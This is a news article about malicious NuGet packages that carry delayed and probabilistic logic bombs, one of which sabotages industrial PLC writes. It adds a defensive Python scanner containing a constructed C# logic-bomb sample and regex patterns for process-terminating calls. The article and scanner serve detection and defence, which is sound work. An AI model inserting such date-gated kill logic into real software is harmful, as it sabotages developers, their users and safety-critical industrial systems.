Security researchers recently discovered a set of malicious packages published on the NuGet platform by a user identified as “shanhai666.” Collectively, MyDbRepository, MCDbRepository, Sharp7Extend, SqlDbRepository, SqlRepository, SqlUnicornCoreTest, SqlUnicornCore and SqlLiteRepository were downloaded almost 9,500 times before they disappeared from the registry. The packages carry embedded logic bombs. Rather than acting immediately the way ransomware does, most of them lie dormant until trigger dates in August 2027 and November 2028, posing a lasting risk to developers and, in the case of Sharp7Extend, to industrial control systems.
The trojanized packages were published between 2023 and 2024. The most dangerous by far is Sharp7Extend, which does not wait for a trigger date: it activates shortly after installation and targets applications that talk to industrial programmable logic controllers (PLCs). It combines two sabotage mechanisms. The first randomly terminates the host process. The second starts 30 to 90 minutes after installation and silently causes roughly 80% of PLC write operations to fail, so the application believes it has written to the controller when it has not. The database-oriented packages behave differently: once their trigger dates pass, each affected operation has a one-in-five chance of terminating the application process. Mark your calendars for those dates!
Nature of the Threat
The logic bombs hidden in these packages illustrate a worrying tactic for winning developer trust. Each package bundles genuinely working functionality, and Sharp7Extend goes further by wrapping Sharp7, a perfectly legitimate library, so the package delivers exactly what a developer expects. That gives a false sense of security, and developers innocently download and integrate these packages into their projects.
Kush Pandya, a security researcher on Socket’s threat research team, underscored just how dangerous Sharp7Extend is.
“The most dangerous package, Sharp7Extend, targets industrial PLCs with dual sabotage mechanisms: immediate random process termination and silent write failures that begin 30-90 minutes after installation, affecting safety-critical systems in manufacturing environments,” – Kush Pandya
The adversary triggers most of the malicious code in a delayed fashion. This strategy lets them accumulate victims before the malware’s full impact is felt. Pandya noted the effectiveness of this approach.
“This staggered approach gives the threat actor a longer window to collect victims before the delayed-activation malware triggers, while immediately disrupting industrial control systems,” – Kush Pandya
Implications for Developers
The timing of this attack raises longer-term worries for any developer who downloaded these packages. By 2027 or 2028, most of them will have moved on to other projects or other firms, so the malware may fire in software whose original authors are long gone and no longer remember which dependencies it pulled in.
The most troublesome aspect, experts warn, is the unpredictability of how the malware executes.
“Developers who installed packages in 2024 will have moved to other projects or companies by 2027-2028 when the database malware triggers, and the 20% probabilistic execution disguises systematic attacks as random crashes or hardware failures,” – Socket
Such unpredictability can produce catastrophic failures in operational industrial settings, where a crash that only happens one time in five looks like flaky hardware and is far more likely to be written off than investigated as an attack.
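Finding this kind of date-gated, probabilistic kill logic after the fact means looking at what the package actually does, not at its name. The following scanner is an added example written for this article, not code from Socket, NuGet or the packages themselves. It assumes you have already turned the package DLLs into C# text with a decompiler such as ILSpy, and it applies three heuristics of my own: a wall-clock comparison (DateTime.Now, UtcNow or Today) against a hard-coded DateTime literal, a process-terminating call within a few lines of that comparison, and an optional Random.Next gate on the same line from which a trigger probability can be read. Both C# samples inside the script are constructed for the example; the trigger date in the suspect sample is made up and is not the real trigger date.

```python
"""Heuristic scan of decompiled C# text for date-gated, probabilistic process kills.

Added example for this article. The detection rules are the author's own heuristics
(not anything published by Socket or NuGet); the C# samples are constructed.
Feed the function the output of a decompiler (e.g. ILSpy) run over a package's DLLs.
"""
import re
from typing import Optional
from datetime import date

# Constructed, hypothetical sample resembling a logic bomb inside an ORM-style helper.
# The date is invented for this example; this is NOT code from the shanhai666 packages.
SUSPECT_CS = """
public static class SqlHelperExt
{
    private static readonly Random _rng = new Random();

    public static int ExecuteSafely(this DbCommand cmd)
    {
        if (DateTime.Now > new DateTime(2027, 8, 15) && _rng.Next(100) < 20)
        {
            Environment.Exit(1);
        }
        return cmd.ExecuteNonQuery();
    }
}
"""

# Constructed benign sample: a hard-coded date, but no clock comparison and no kill call.
BENIGN_CS = """
public static bool IsLegacyFormat(DateTime stamp)
{
    return stamp < new DateTime(2020, 1, 1);
}
"""

# new DateTime(yyyy, m, d) literal; we only care about year/month/day.
DATE_CTOR = re.compile(r"new\s+DateTime\s*\(\s*(\d{4})\s*,\s*(\d{1,2})\s*,\s*(\d{1,2})")
# Reads of the wall clock on the same line as the literal.
CLOCK = re.compile(r"DateTime\.(?:Now|UtcNow|Today)")
# Random.Next(n) < k  or  <= k  on the same line: gives a trigger probability.
RANDOM_GATE = re.compile(r"\.Next\s*\(\s*(\d+)\s*\)\s*(<=|<)\s*(\d+)")
# Calls that end the hosting process outright.
KILL = re.compile(r"Environment\.Exit|Environment\.FailFast|Process\.GetCurrentProcess\(\)\.Kill")


def find_logic_bomb_candidates(source: str, today: Optional[str] = None, window: int = 4) -> list:
    """Return one finding per line that compares the clock against a hard-coded date
    and has a process-terminating call within `window` lines below it.

    `today` is an ISO date string used only to label the trigger as future or past;
    it defaults to the real current date.
    """
    now = date.fromisoformat(today) if today else date.today()
    lines = source.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        m_date = DATE_CTOR.search(line)
        if not (m_date and CLOCK.search(line)):
            continue
        try:
            trigger = date(*map(int, m_date.groups()))
        except ValueError:
            continue  # not a real calendar date, so not a usable trigger
        context = "\n".join(lines[idx: idx + window])
        m_kill = KILL.search(context)
        if not m_kill:
            continue
        probability = 1.0  # unconditional unless a Random gate sits on the same line
        m_rng = RANDOM_GATE.search(line)
        if m_rng:
            n, op, k = int(m_rng.group(1)), m_rng.group(2), int(m_rng.group(3))
            probability = (k + (1 if op == "<=" else 0)) / n if n else 1.0
        findings.append({
            "line": idx + 1,
            "trigger": trigger.isoformat(),
            "status": "future" if trigger > now else "past",
            "probability": probability,
            "action": m_kill.group(0),
        })
    return findings


if __name__ == "__main__":
    for hit in find_logic_bomb_candidates(SUSPECT_CS):
        print(f"line {hit['line']}: kill via {hit['action']} after {hit['trigger']} "
              f"({hit['status']}), p={hit['probability']:.0%} per call")
    print("benign sample:", find_logic_bomb_candidates(BENIGN_CS))
```

The heuristics are deliberately narrow so that ordinary date handling (expiry checks, format versioning) does not fire; the benign sample is skipped because nothing reads the clock on that line and nothing terminates the process nearby. A real review would widen the window, follow calls into helper methods, and also look for the other behaviour described above: write paths that swallow exceptions or return success without touching the I/O layer.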
Analysis and Response
The shanhai666 moniker is notable because it suggests the threat actor is of Chinese origin, and certain coding practices lend further weight to that attribution. More troubling than the actor’s identity, though, is the question of motive, which remains unknown.
“This campaign demonstrates sophisticated techniques rarely combined in NuGet supply chain attacks,” – Socket
In response, NuGet has removed the affected packages from its platform. Experts nonetheless urge developers to remain vigilant: check existing projects and lock files for any of the package names listed above, and conduct thorough source code analysis before integrating any third-party package into a project.

